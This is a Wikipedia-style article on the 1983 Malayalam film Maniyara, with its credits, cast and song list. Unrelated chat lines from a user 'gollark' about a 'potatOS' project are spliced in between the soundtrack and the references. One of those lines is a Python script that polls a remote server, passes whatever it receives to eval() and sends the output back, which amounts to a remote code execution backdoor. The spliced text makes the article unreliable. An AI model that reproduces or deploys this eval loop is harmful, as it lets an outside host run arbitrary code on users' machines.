Maniyara
Maniyara is a 1983 Indian Malayalam film, Screenplay by moidu Padiyath directed by M. Krishnan Nair and produced by T. E. Vasudevan. The film stars Mammootty, Seema, Adoor Bhasi and Shanthi Krishna in the lead roles. The film has musical score by A. T. Ummer.[1][2][3][4]
Maniyara | |
---|---|
Directed by | M. Krishnan Nair |
Produced by | T. E. Vasudevan |
Starring | Mammootty Seema Adoor Bhasi Shanthi Krishna |
Music by | A. T. Ummer |
Production company | Jaijaya Combines |
Distributed by | Chalachitra |
Release date |
|
Country | India |
Language | Malayalam |
Cast
- Mammootty as Shameer
- Seema as Noorjahan
- Adoor Bhasi as Shameer's father
- Shubha (actress) as Shameer's mother
- Sathyakala as Ramla (Shameer's mother)
- Balan K. Nair as Noorjahan's father
- Shanthi Krishna as Ayyoob's wife
- Shanavas as Ayyoob
- Azeez
- Sankaradi as Sulaiman
- Mala Aravindan
- Bahadoor
Soundtrack
The music was composed by A. T. Ummer and the lyrics were written by P. Bhaskaran.
No. | Song | Singers | Lyrics | Length (m:ss) |
---|---|---|---|---|
1 | "Kwaja Sheikhin Maqbaraa" | K. J. Yesudas, Jolly Abraham | P. Bhaskaran | |
2 | "Mizhiyina Njaanadaykkumpol" | K. J. Yesudas, Ambili | P. Bhaskaran | |
3 | "Ninavinte Kaayalil" | K. J. Yesudas, Ambili | P. Bhaskaran | |
4 | "Penne Manavaatti" | K. J. Yesudas, Vani Jairam | P. Bhaskaran | |
5 | "Viphalam" | S. Janaki, Chorus | P. Bhaskaran |
gollark: This is *technically* a "web license lookup thing".
gollark: OmniDisks look up some random pastebin file.
gollark: Hmm, idea: what if I make `potatOS.update` just send an event to `potatoupd` instead of actually running the update routines itself?
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
References
- "Maniyara". entertainment.oneindia.in. Retrieved 20 July 2014.
- "Maniyara". www.malayalachalachithram.com. Retrieved 19 October 2014.
- "Maniyara". malayalasangeetham.info. Retrieved 19 October 2014.
- "Maniyara". spicyonion.com. Retrieved 19 October 2014.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.